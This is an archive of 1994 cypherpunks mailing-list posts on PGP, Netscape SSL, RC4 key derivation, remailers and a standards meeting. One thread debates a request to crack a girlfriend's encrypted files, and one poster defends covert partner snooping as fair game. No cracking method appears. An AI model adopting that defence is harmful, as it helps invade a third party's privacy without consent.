It is still a problem to convince experts that a hash function is a one-way function...

> Fourth question:
> To sign a post with PGP (from within vi, under trn) Do I include
> the header in the lines to be run through 'pgp -fast' or not?
> (I have the cp list go into a news gateway on my home machine so
> that threads are easier to follow)

Should not do this. The header is modified by transport agents, e.g. paths and date are added.

Hadmut

From jya at pipeline.com Thu Dec 22 09:22:48 1994
From: jya at pipeline.com (John Young)
Date: Thu, 22 Dec 94 09:22:48 PST
Subject: BYTE on Netscape
Message-ID: <199412221722.MAA18998@pipe3.pipeline.com>

Ben Smith writes supportively in the January 1995 issue on Netscape's products -- freebie and commercial. See pp.197-200.

Two excerpts:

"Netsite Commerce Server is Netscape Communications' most important product because it offers the basic requirements for secure transactions over the otherwise open-for-snooping-and-spoofing Internet."

[Brief discussion of crypto system -- RSA, PGP similarity and difference.]

"Netscape Communications may not be able to clean out the loose threads and cobwebs of the Internet, but its client and servers are the kinds of products the Internet needs to make the transition from being a cobweb of experimental projects to a serious commercial marketplace."
From eric at remailer.net Thu Dec 22 09:54:31 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 22 Dec 94 09:54:31 PST Subject: MEETING NOTICE: IEEE RSA/Diffie-Hellman Working Group Message-ID: <199412221851.KAA18678@largo.remailer.net> The following is the notice for the IEEE P1363 working group. The official title includes RSA and Diffie-Hellman, but these two algorithms are on hold because of patent issues. The committee is going forward on elliptic curve systems. Here's how this committee works. The working group is composed of individuals, not representatives of companies. Anybody can show up and participate. The voting rules are as follows. If you've shown up at two of the last three meetings, you can vote. That's it. The next meeting is typically set at the current one. The meetings are held in conjunction with various security conferences, typically, to make it easier for everyone to attend. The last two meetings were at CRYPTO in mid August in Santa Barbara, CA and at the Fairfax, VA security conference in early November. The next one will be possibly at the Oakland, CA conference held in May at the Claremont Hotel. I'd urge all interested parties to make an effort to attend. Eric ----------------------------------------------------------------------------- Date: Wed, 21 Dec 94 11:35:47 PST From: burt at RSA.COM (Burt Kaliski) To: p1363 at RSA.COM Subject: MEETING NOTICE: IEEE RSA/Diffie-Hellman Working Group IEEE P1363: Standard for RSA, Diffie-Hellman and Related Public-Key Cryptography MEETING NOTICE Thursday, January 12, 1995, 9:00-4:00pm Hotel Sofitel, Redwood Shores, California This fifth meeting of the P1363 working group, open to the public, will review draft sections of a standard for RSA, Diffie-Hellman and related public-key cryptography. The meeting follows the 1995 RSA Data Security Conference, held January 9-11 at the same location. AGENDA 1. Approval of Agenda 2. Approval of Minutes from November Meeting 3. Officers' Reports 4. 
Review of Draft Standard a. General material b. Elliptic curves c. Hardware support d. Random number generation 5. Proposals for New Sections 6. New Work Assignments 7. Meeting Schedule If you'd like to participate, contact Burt Kaliski, the working group's chair, at RSA Laboratories, 100 Marine Parkway, Redwood City, CA 94065. Phone: (415) 595-7703, FAX: (415) 595-4126, E-mail: . Draft sections and copies of previous minutes are available via anonymous ftp to rsa.com in the "pub/p1363" directory. The working group's electronic mailing list is ; to join, send e-mail to . There is no meeting fee this time. Hotel Sofitel is at 223 Twin Dolphin Drive in Redwood Shores, California, about 12 miles south of San Francisco International Airport. From U.S. 101, take the Redwood Shores Parkway exit, and turn left at the second traffic light. Phone: (415) 598-9000. From rarachel at prism.poly.edu Thu Dec 22 09:58:40 1994 From: rarachel at prism.poly.edu (Arsen Ray Arachelian) Date: Thu, 22 Dec 94 09:58:40 PST Subject: Name that phone In-Reply-To: Message-ID: <9412221743.AA07856@prism.poly.edu> How about VGP? (Very Good Phone) or VGPP (Very Good Private Phone) From bart at netcom.com Thu Dec 22 10:23:09 1994 From: bart at netcom.com (Harry Bartholomew) Date: Thu, 22 Dec 94 10:23:09 PST Subject: Merry Cryptmas Message-ID: <199412221820.KAA09257@netcom11.netcom.com> For the holidays I recommend Tim's latest essay, available from ftp.netcom.com:/pub/tc/tcmay/Anarchy for your reading pleasure. This is a reasoned, balanced presentation that will surely propagate the memes of cypherpunk interest to the broader public. Pass it on. 
From skaplin at skypoint.com Thu Dec 22 10:57:16 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Thu, 22 Dec 94 10:57:16 PST Subject: alpha.c2.org software upgrade In-Reply-To: <9412220301.AA20375@toad.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <9412220301.AA20375 at toad.com>, you wrote: > It is now possible to send outgoing mail via the alias remailer at > alpha.c2.org. To send a message, create a message of the following > format: > > From: me at alpha.c2.org (My Nym) > Password: mypass > Subject: test > To: alt.test at demon.co.uk > > This is my message. > > Encrypt this with the public key for the remailer and send it to > alias at alpha.c2.org. It will decrypt it and send your message > (after verifying and removing the password line.) Can you please provide details on obtaining a password and the remailer's public key. Thanks, Sam ============================================================================== Marriage is like a cage; one sees the birds outside desperate to get in, and those inside equally desperate to get out. - Michel Eyquem de Montaigne ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. 
============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvnKY8lnXxBRSgfNAQGK2gf9HFMNKe64xk/YdTYdiG5DHGDvgcZI4U8I hCDsNF93piGOS4zDf4z1qNI/aWlyc2km6tUGOzIOqyrl9NPu7Wdm4by80wHTJXEp wWq7CpO/Gks8YS2O4j6uy2KehmUGbPXohB+o1XknzjG84uXoLqAZuO634MZKu9W8 Qc6hx8bHjtV/ogbeuxtyjd3V39uHza61stNmNM/Ls5KK3VOYDqb61g0g3qa3k5wn bo5mnxkWAhgjGrRNhWY4X/L6m8i011/ExWMneBmrtkFSlXaqr0mWA8rv89gU8Mue d3dc6fuCrm+qNIBs4ZUv8tR2hzjHyx6w4/fZJAssjuPy880xYPdnUA== =rIrc -----END PGP SIGNATURE----- From kipp at warp.mcom.com Thu Dec 22 10:59:14 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Thu, 22 Dec 94 10:59:14 PST Subject: SSL server experiment Message-ID: <9412221854.AA10294@warp.mcom.com> In article <199412200623.WAA11611 at jobe.shell.portal.com>, you write: > Here is a perl script which connects to a netscape-style "https" server. > The results of running it with "https.pl home1.mcom.com 443" is: > > Attempting connection to 198.93.93.10 > Connected > Sent message, length 40 > Received length = 502 > Message type = 4 > Session ID Hit flag = 0 > Certificate type = 1 > Server version = 2 > Certificate length = 472 > Cipher specs length = 3 > Conn ID length = 16 > Supported ciphers: > RC4_EXPORT40, 128 bits > > This way you can see which of the 5 cipher options (RC4 or RC2 in full > and export versions, plus IDEA) are supported by any given server. You > always use port 443 and just specify the machine name. I was a > little surprised that Netscape's own server is only running the 40 bit > version. I hope the export restrictions will not prevent the use of > full strength ciphers. Cool! The 1.1 version of server&client will support 128 bit stuff...The 128 bit client will not be available for ftp though...bloody export laws --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. 
kipp at mcom.com http://www.mcom.com/people/kipp/index.html From jburrell at crl.com Thu Dec 22 11:09:38 1994 From: jburrell at crl.com (Jason Burrell) Date: Thu, 22 Dec 94 11:09:38 PST Subject: Making sure a program gets to the receiver intact In-Reply-To: <9412220711.AA21268@anon.penet.fi> Message-ID: On Thu, 22 Dec 1994 an169306 at anon.penet.fi wrote: > 2: Someone breaking into my apt, sticking a keyboard monitor on, getting > my passphrase and key. I'm quite concerned about that myself. Is there a way to tell if your computer has been tampered with? Assume that looking at the case doesn't do much good (they get by that easy), and if they want to hide the bug they can. Voltage monitoring? > Pardon the anonymous ID, as my reputation with my REAL user id is not > so great. (No, I am not Lance, but not that better off due to tons > of dumb mistakes with my regular ID on this list.) Ah. Glad you put in the "No, I'm not Lance" part. I was wondering when I read that paragraph. :) From Tony.Gurnick at nzdairy.co.nz Thu Dec 22 11:18:49 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Thu, 22 Dec 94 11:18:49 PST Subject: Kiwi cypherpunks & other things Message-ID: <94122308083203@nzdairy.co.nz> All, I am going on holiday for 3 weeks so will be unsubing from the list for a while. Can you email me directly about kiwi cpunks? and other stuff. A listserv @ cybernet would be a good thing. We could have our own NZ kiwi cypherpunks mailing list! Oh, what we would talk about! :) Oh, Thanks to all who helped me with the 2048 bit keys. I thought it was the 15-dec-94! Anyway I changed the source a bit so now I can generate 16384 bit keys. On the other hand trying to gen a 2048 bit key with this modified code just failed so maybe I`ll have to wait!!! (shiiit!) I cant set the clock on our machines. 
T

From lcottrell at popmail.ucsd.edu Thu Dec 22 12:07:56 1994
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Thu, 22 Dec 94 12:07:56 PST
Subject: Making sure a program gets to the receiver intact
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>On Thu, 22 Dec 1994 an169306 at anon.penet.fi wrote:
>> 2: Someone breaking into my apt, sticking a keyboard monitor on, getting
>> my passphrase and key.
>
>I'm quite concerned about that myself. Is there a way to tell if your
>computer has been tampered with? Assume that looking at the case doesn't
>do much good (they get by that easy), and if they want to hide the bug
>they can. Voltage monitoring?

You might consider putting the computer in a strong ventilated metal box, and using some kind of wax or lead seal. It is unlikely that any black bag team would have the right tools to cover any traces of tampering.

>
>> Pardon the anonymous ID, as my reputation with my REAL user id is not
>> so great. (No, I am not Lance, but not that better off due to tons
>> of dumb mistakes with my regular ID on this list.)
>
>Ah. Glad you put in the "No, I'm not Lance" part. I was wondering when I
>read that paragraph. :)

Hey! hey! Nothing wrong with the name Lance. It is all a matter of the LAST name.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath.
At night the ice weasels come." --Nietzsche

From kipp at warp.mcom.com Thu Dec 22 13:54:17 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Thu, 22 Dec 94 13:54:17 PST
Subject: Time to exhaustively break 40-bit RC4?
In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com>
Message-ID: <9412221345.ZM12940@warp.mcom.com>

On Dec 17, 1:49pm, Hal wrote:
> Subject: Re: Time to exhaustively break 40-bit RC4?
> I notice in the Netscape SSL spec the 40-bit export-approved RC4
> key generation is a little more complicated than I would have thought.
> First a 128 bit "master key" is chosen and 88 bits are revealed, leaving
> 40 bits secret. Then the RC4 session key is generated as the MD5 hash of
> this master key plus about 32 bytes of publicly known but random
> information. I'm not clear whether the 128-bit output of the MD5 hash is
> then used as the RC4 key, or whether only 40 bits are used (and if so,
> whether there are any public bits in the key besides these 40).

128 bits are used. I have cleaned up the spec language to make this more obvious.

> If the former, then this extra hash step should really slow down
> exhaustive search of the key space. If the latter, then it is not clear
> why the master key is key-size restricted at all since it is not likely
> to be used in searching the key space. Maybe someone from Netscape could
> clear up how this is done.

Hopefully it will slow down exhaustive key search.

Hope this helps, and thanks again for the comments.

--
---------------------------------------------------------------------
Kipp E.B. Hickman Netscape Communications Corp.
kipp at mcom.com http://www.mcom.com/people/kipp/index.html

From dave at esi.COM.AU Thu Dec 22 15:57:55 1994
From: dave at esi.COM.AU (Dave Horsfall)
Date: Thu, 22 Dec 94 15:57:55 PST
Subject: Is it possible to break Norton Encrypt??
In-Reply-To: <941222003135.20215af5@SCSUD.CTSTATEU.EDU>
Message-ID:

On Thu, 22 Dec 1994, ADAM GERSTEIN, _THE_ MACGURU wrote:

> A friend of mine thinks his girlfriend has been cheating on him, and
> thinks the proof may be in a few Norton Encrypt files. Is there any way
> to get the password with a data/resource editor, or is he
> shit-out-of-luck and looking for a new girl-friend?

Boy; talk about an inappropriate use of technology... Is "privacy" in that guy's vocabulary? I respectfully submit that if he has to start snooping on her, the relationship is over anyway.

--
Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD

From lmccarth at thor.cs.umass.edu Thu Dec 22 16:45:30 1994
From: lmccarth at thor.cs.umass.edu (L. McCarthy)
Date: Thu, 22 Dec 94 16:45:30 PST
Subject: Breaking into girlfriend's files
In-Reply-To:
Message-ID: <199412230045.TAA21904@thor.cs.umass.edu>

Dave Horsfall writes:
> ADAM GERSTEIN, _THE_ MACGURU writes:
> > A friend of mine thinks his girlfriend has been cheating on him, and
> > thinks the proof may be in a few Norton Encrypt files. Is there any way
> > to get the password with a data/resource editor, or is he shit-out-of-luck

> Boy; talk about an inappropriate use of technology... Is "privacy"
> in that guy's vocabulary? I respectfully submit that if he has to
> start snooping on her, the relationship is over anyway.

My sentiments exactly. Whether or not she's two-timing, I imagine she'd be pretty upset (and justifiably so) if she knew her boyfriend wants to break into her private documents. He should *ask* her straight out to confirm or deny his suspicions. If he doesn't like the answer, he should get out.

Someone needs to give her PGP ASAP, IMHO....

-L.
Futplex McCarthy

From nesta at nesta.pr.mcs.net Thu Dec 22 17:16:21 1994
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Thu, 22 Dec 94 17:16:21 PST
Subject: Chicago/MidWest Cypherpunks
In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu>
Message-ID:

I have recently moved to Chicago, and was wondering if there was a regional branch of the Cypherpunks in this area. If so is there a meeting scheduled soon?

**I've got the strap-on connections in Lesbos, and the KY trust in Sodom, I'm the only Man in Istanbul, I'm the only punk in Islam, I'm the only bar on Skid Row, I'm the only whore on the waterfront**
_Cobble Stone Gardens_ William Seward Burroughs

From werewolf at io.org Thu Dec 22 19:24:27 1994
From: werewolf at io.org (Mark Terka)
Date: Thu, 22 Dec 94 19:24:27 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412230045.TAA21904 at thor.cs.umass.edu>, "L. McCarthy" wrote:
>Dave Horsfall writes:
>> ADAM GERSTEIN, _THE_ MACGURU writes:
>> > A friend of mine thinks his girlfriend has been cheating on him, and
>> > thinks the proof may be in a few Norton Encrypt files. Is there any way
>> > to get the password with a data/resource editor, or is he shit-out-of-luck
>> Boy; talk about an inappropriate use of technology... Is "privacy"
>> in that guy's vocabulary? I respectfully submit that if he has to
>> start snooping on her, the relationship is over anyway.

GROAN! What the hell is this list about anyway?????? I think we are losing perspective about encryption, privacy etc etc...

Putting it quite simply, the individual was asking about how to make an attack on an opponent. Whether that opponent is a girlfriend, spouse, competitor or terrorist group, who cares? Let's save the sermonizing for Ann Landers...what state the relationship is irrelevant.

The gentleman asked a question regarding a standard cryptographic problem...
how you can intercept and interpret encrypted information, either in theory or in practice. To make judgement calls is WAY out of line and a hell of a bad precedent for this group.

I bet the poster would have gotten a more sympathetic response if he said he had gotten his hands on a diplomatic cable....

>
>My sentiments exactly. Whether or not she's two-timing, I imagine she'd be
>pretty upset (and justifiably so) if she knew her boyfriend wants to break
>into her private documents. He should *ask* her straight out to confirm or
>deny his suspicions. If he doesn't like the answer, he should get out.

Oh boy! Pretty soon we will have this list as "cypherpunks giving advice to the lovelorn..."!!! Let's cut the crap, stick to the problem at hand and offer solutions to what the participants of the list know best, namely the use and analysis of cryptographic problems. Save the relationship bullshit for Masters and Johnson....

>
>Someone needs to give her PGP ASAP, IMHO....

Sure, from a dispassionate point of view, I agree. But I thought that the whole point of this list was the promotion of PGP and the discussion of the pro's and con's of encryption in general. That should include attacking as well as defense. Since, how can you rationally discuss defense unless you know what kind of attack your opponents can mount against you???????
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From unicorn at access.digex.net Thu Dec 22 19:43:02 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Thu, 22 Dec 94 19:43:02 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu>
Message-ID:

On Thu, 22 Dec 1994, L. McCarthy wrote:

> Date: Thu, 22 Dec 1994 19:45:17 -0500 (EST)
> From: L. McCarthy
> To: cypherpunks at toad.com
> Subject: Re: Breaking into girlfriend's files
>
> Dave Horsfall writes:
> > ADAM GERSTEIN, _THE_ MACGURU writes:
> > > A friend of mine thinks his girlfriend has been cheating on him, and
> > > thinks the proof may be in a few Norton Encrypt files. Is there any way
> > > to get the password with a data/resource editor, or is he shit-out-of-luck
> > Boy; talk about an inappropriate use of technology... Is "privacy"
> > in that guy's vocabulary? I respectfully submit that if he has to
> > start snooping on her, the relationship is over anyway.
>
> My sentiments exactly. Whether or not she's two-timing, I imagine she'd be
> pretty upset (and justifiably so) if she knew her boyfriend wants to break
> into her private documents. He should *ask* her straight out to confirm or
> deny his suspicions. If he doesn't like the answer, he should get out.
>
> Someone needs to give her PGP ASAP, IMHO....
>
> -L. Futplex McCarthy
>

As darwinian as it seems, perhaps someone should just tell the guy how to bust Norton's encryption, eh?

Since when are cypherpunks relationship counselors?
If she gets burned using norton encrypt, perhaps she'll take the time to learn about real encryption. (I assume Norton's is trash)

Short term privacy loss perhaps, but long term gain.

If it were to be otherwise, I guess we all better stop posting crypto weaknesses at all, after all, who knows what girlfriend will next be violated if we tell joe hacker how to break e.g., enigma. While everyone is at it, why not just subscribe wholeheartedly to the security through obscurity doctrine...?

The more I think about the above, the more I wonder if those on the list have conflicting goals, that is, absolute privacy by agreement. Are we really that naive?

If so, why develop crypto at all?

-uni- (Dark)

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From ianf at sydney.sgi.com Thu Dec 22 20:07:48 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Thu, 22 Dec 94 20:07:48 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu>
Message-ID: <9412231452.ZM19768@wiley.sydney.sgi.com>

On Dec 22, 9:46pm, Mark Terka wrote:
> GROAN! What the hell is this list about anyway?????? I think we are losing
> perspective about encryption, privacy etc etc...

> Putting it quite simply, the individual was asking about how to make an attack
> on an opponent. Whether that opponent is a girlfriend, spouse, competitor or
> terrorist group, who cares? Let's save the sermonizing for Ann Landers...what
> state the relationship is irrelevant.

What a load of amoral rubbish.

Cypherpunks is a group whose members believe in the application of technology to PROTECT privacy, not to violate someone else's. Once you assume that capability implies right, you're on very shaky moral ground, but that is exactly what you are saying in this post.
I find that position repellent, and I would be very surprised and not a little disappointed if you find many others here who felt the same way.

> I bet the poster would have gotten a more sympathetic response if he said he
> had gotten his hands on a diplomatic cable....

Possibly. IMO, what the original requester was asking for was so repulsive and immature that the responses so far have been mild.

Ian.

From dave at esi.COM.AU Thu Dec 22 20:39:01 1994
From: dave at esi.COM.AU (Dave Horsfall)
Date: Thu, 22 Dec 94 20:39:01 PST
Subject: Breaking into girlfriend's files
In-Reply-To:
Message-ID:

On Thu, 22 Dec 1994, Mark Terka wrote:

> GROAN! What the hell is this list about anyway?????? I think we are losing
> perspective about encryption, privacy etc etc...
                                ^^^^^^^
You said it.

> Putting it quite simply, the individual was asking about how to make an attack
> on an opponent. Whether that opponent is a girlfriend, spouse, competitor or
> terrorist group, who cares? Let's save the sermonizing for Ann Landers...what
> state the relationship is irrelevant.

And *HE* gave the reason - he wanted to go rifling through his girlfriend's private files. And here I was, thinking that this list was about "better privacy through cryptography" - I must have subscribed to alt.2600 by mistake... Come to think of it, that's a better place for the original query...

> The gentleman asked a question regarding a standard cryptographic problem...
> how you can intercept and interpret encrypted information, either in theory
> or in practice. To make judgement calls is WAY out of line and a hell of a bad
> precedent for this group.

Read it again - he specifically wanted to sneak into his partner's files; that is a clear invasion of privacy. Jeeze - I thought a Yank would have understood this...

> I bet the poster would have gotten a more sympathetic response if he said he
> had gotten his hands on a diplomatic cable....
And would you have been just as sympathetic if somebody wanted to rifle YOUR files?

> Oh boy! Pretty soon we will have this list as "cypherpunks giving advice to
> the lovelorn..."!!! Let's cut the crap, stick to the problem at hand and
> offer solutions to what the participants of the list know best, namely the
> use and analysis of cryptographic problems.

That has nothing to do with it - person A wanted advice on how to invade person B's privacy (he presumably doesn't have the guts to just ask her). Sorry, but privacy works both ways - she's entitled to it just as much as anybody else.

--
Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD

From lmccarth at thor.cs.umass.edu Thu Dec 22 20:49:53 1994
From: lmccarth at thor.cs.umass.edu (L. McCarthy)
Date: Thu, 22 Dec 94 20:49:53 PST
Subject: Breaking into girlfriend's files
Message-ID: <199412230455.XAA07179@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn writes:
> If she gets burned using norton encrypt, perhaps she'll take the time to
> learn about real encryption. (I assume Norton's is trash)
> Short term privacy loss perhaps, but long term gain.

This sounds to me rather like saying: "If the American public gets burned by accepting Skipjack as the crypto standard, perhaps they'll take the time to learn about real encryption."

I prefer the version where the American public doesn't get burned in the first place. If Clipper has to be adopted before the public will learn about real encryption, why are we bothering to try to promote it now ? Shouldn't we be backing Clipper wholeheartedly, to teach 'em a lesson ?

[...]
> The more I think about the above, the more I wonder if those on the list
> have conflicting goals, that is, absolute privacy by agreement. Are we
> really that naive?

I have ideals, yes. My deepest condolences if you don't have any.

- -L.
Futplex McCarthy

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From blancw at pylon.com Thu Dec 22 20:59:51 1994
From: blancw at pylon.com (blancw at pylon.com)
Date: Thu, 22 Dec 94 20:59:51 PST
Subject: Breaking into girlfriend's files
Message-ID: <199412230500.VAA03390@deepthought.pylon.com>

Snappy comeback to msg by Mark Terka:

"GROAN! What the hell is this list about anyway?????? I think we are losing perspective about encryption, privacy etc etc...

From the 'Welcome' message for new subscribers to the list:

"Cypherpunks will make the networks safe for privacy."

It doesn't say "Cypherpunks will make it possible to mount crypto invasions against your opponents."

"To make judgement calls is WAY out of line and a hell of a bad precedent for this group."

Yes, it's bad precedent, seeing as how everyone on the list is unoriginal, followers who are likely to take any ideas presented as incentive to act, as sanctioned by the members. Everyone knows that, that's why the list is always so quiet.

.. Blanc

From werewolf at io.org Thu Dec 22 23:06:38 1994
From: werewolf at io.org (Mark Terka)
Date: Thu, 22 Dec 94 23:06:38 PST
Subject: Breaking into girlfriend's files
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article , Dave Horsfall wrote:
>On Thu, 22 Dec 1994, Mark Terka wrote:
>
>> GROAN! What the hell is this list about anyway?????? I think we are losing
>> perspective about encryption, privacy etc etc...
>                                ^^^^^^^
>You said it.

And the defense thereof.....

>
>> Putting it quite simply, the individual was asking about how to make an attack
>> on an opponent.
Whether that opponent is a girlfriend, spouse, competitor or
>> terrorist group, who cares? Let's save the sermonizing for Ann Landers...what
>> state the relationship is irrelevant.
>
>And *HE* gave the reason - he wanted to go rifling through his girlfriend's
>private files. And here I was, thinking that this list was about "better
>privacy through cryptography" - I must have subscribed to alt.2600 by
>mistake... Come to think of it, that's a better place for the original
>query...

Gee...I guess we shouldn't get too concerned when gov't agencies try to break OUR communications on a large scale ...or maybe the cypherpunk system of remailers were set up just as a hobby...

>
>> The gentleman asked a question regarding a standard cryptographic problem...
>> how you can intercept and interpret encrypted information, either in theory
>> or in practice. To make judgement calls is WAY out of line and a hell of a bad
>> precedent for this group.
>
>Read it again - he specifically wanted to sneak into his partner's files;
>that is a clear invasion of privacy. Jeeze - I thought a Yank would have
>understood this...

Sorry....I'm Canadian......and sure. He wanted to sneak into his partners files. What a strange cryptographic concept that happens to be....

>
>> I bet the poster would have gotten a more sympathetic response if he said he
>> had gotten his hands on a diplomatic cable....
>
>And would you have been just as sympathetic if somebody wanted to rifle
>YOUR files?

Yup! All's fair in luv...or WAR! If you aren't prepared to play the game, then stay at home!!

>
>> Oh boy! Pretty soon we will have this list as "cypherpunks giving advice to
>> the lovelorn..."!!! Let's cut the crap, stick to the problem at hand and
>> offer solutions to what the participants of the list know best, namely the
>> use and analysis of cryptographic problems.
>
>That has nothing to do with it - person A wanted advice on how to invade
>person B's privacy (he presumably doesn't have the guts to just ask her).
>Sorry, but privacy works both ways - she's entitled to it just as much
>as anybody else.

Just like the Japanese were entitled to THEIR privacy before Midway, eh?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From werewolf at io.org Thu Dec 22 23:06:39 1994
From: werewolf at io.org (Mark Terka)
Date: Thu, 22 Dec 94 23:06:39 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <9412231452.ZM19768 at wiley.sydney.sgi.com>, you wrote:
>On Dec 22, 9:46pm, Mark Terka wrote:
>> GROAN! What the hell is this list about anyway?????? I think we are losing
>> perspective about encryption, privacy etc etc...
>
>> Putting it quite simply, the individual was asking about how to make an
>attack
>> on an opponent. Whether that opponent is a girlfriend, spouse, competitor or
>> terrorist group, who cares? Let's save the sermonizing for Ann Landers...what
>> state the relationship is irrelevant.
>
>What a load of amoral rubbish.

Oh goody! Now we are getting a judgement call with respect to how cryptography in general aids "the greater good". Do you suppose the NSA makes the same call when they do routine traffic analysis or try to bust a suspiciously (to them) encrypted message??????

>
>Cypherpunks is a group whose members believe in the application of
>technology to PROTECT privacy, not to violate someone else's.
Ummmm...excuse me...."the cypherpunks are an informal group of people interested in teaching and learning about cryptography. They also experiment with cryptography and try to put it into use" from Applied Cryptography by Bruce Schneier....pg 445.

That to me indicates that the members of this list should be at least remotely interested in the subject of attacks as well as defense as you can't defend against something unless the method of attack has been discussed.

>Once you assume that capability implies right, you're on very
>shaky moral ground, but that is exactly what you are saying in this
>post. I find that position repellent, and I would be very surprised
>and not a little disappointed if you find many others here who felt
>the same way.

GROAN! (again) And how, pray tell, do we go about protecting ourselves against others if we are not prepared to discuss what sort of attacks may be mounted against us?????

Like I alluded to before, I bet if it was a case of someone trying to descramble something like skipjack to try and discover something about National Security (ours OR theirs) I bet the members of this list would have fallen all over themselves trying to help the original poster.

I don't recall seeing too much in the way of condemnation of the guy that posted RC4 to this list ..... but as soon as we see something that touches close to home like male/female relationships, the shit hits the fan!!!!!

>
>> I bet the poster would have gotten a more sympathetic response if he said he
>> had gotten his hands on a diplomatic cable....
>
>Possibly. IMO, what the original requester was asking for was so
>repulsive and immature that the responses so far have been mild.

And in my opinion what the original poster was no different than the British attack on "Enigma" or the American attack on "Purple".
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From werewolf at io.org Thu Dec 22 23:06:40 1994
From: werewolf at io.org (Mark Terka)
Date: Thu, 22 Dec 94 23:06:40 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <199412230455.XAA07179@bb.hks.net>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412230455.XAA07179 at bb.hks.net>, you wrote:
>> The more I think about the above, the more I wonder if those on the list
>> have conflicting goals, that is, absolute privacy by agreement. Are we
>> really that naive?
>
>I have ideals, yes. My deepest condolences if you don't have any.

Like the agencies we worry the most about.....? FBI...CIA...NSA...etc???

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From blancw at pylon.com Fri Dec 23 03:31:52 1994
From: blancw at pylon.com (blancw at pylon.com)
Date: Fri, 23 Dec 94 03:31:52 PST
Subject: Breaking into girlfriend's files
Message-ID: <199412231132.DAA06182@deepthought.pylon.com>

Responding to msg by Mark Terka, who is having a bad crypto day:

I don't recall seeing too much in the way of condemnation of the guy that posted RC4 to this list .....
but as soon as we see something that touches close to home like male/female relationships, the shit hits the fan!!!!!
............................................................

Don't you distinguish between the evil that governments can do, and the evil that female opponents in relationships (of dubious merit) can achieve?

Are you proposing that some people make it a policy to cheat on their friends, just as some governments do, and should be dealt with in like manner, automatically and without further consideration?

It were a wise & just government, which could not distinguish between the good, the bad, and the all rest.

And who appointed you the list censor, anyway? If it makes sense that a cypherpunk could provide instructions for breaking a password, it also makes sense that they could choose to withhold it. After all, if they are smart enough to know how to do this, they should also be capable of making a reasoned decision about when it might be reprehensible - with or without your approval.

.. Blanc

From eric at remailer.net Fri Dec 23 08:10:10 1994
From: eric at remailer.net (Eric Hughes)
Date: Fri, 23 Dec 94 08:10:10 PST
Subject: SSL server experiment
In-Reply-To: <9412221854.AA10294@warp.mcom.com>
Message-ID: <199412231707.JAA19961@largo.remailer.net>

   From: kipp at warp.mcom.com (Kipp E.B. Hickman)

   The 1.1 version of server&client will support 128 bit stuff...The 128 bit client will not be available for ftp though...bloody export laws

How will the 128 bit client be available?

Eric

From jya at pipeline.com Fri Dec 23 08:30:48 1994
From: jya at pipeline.com (John Young)
Date: Fri, 23 Dec 94 08:30:48 PST
Subject: NYT Correction on Sonofusion
Message-ID: <199412231630.LAA02234@pipe1.pipeline.com>

Correction today:

"A headline in Science Times on Tuesday about attempts to create thermonuclear fusion by aiming sound waves at microscopic bubbles misstated the process involved. It is high-temperature fusion, not cold fusion."
Note: The NYT advertises an email address for "comments on published articles about science and suggestions for coverage":

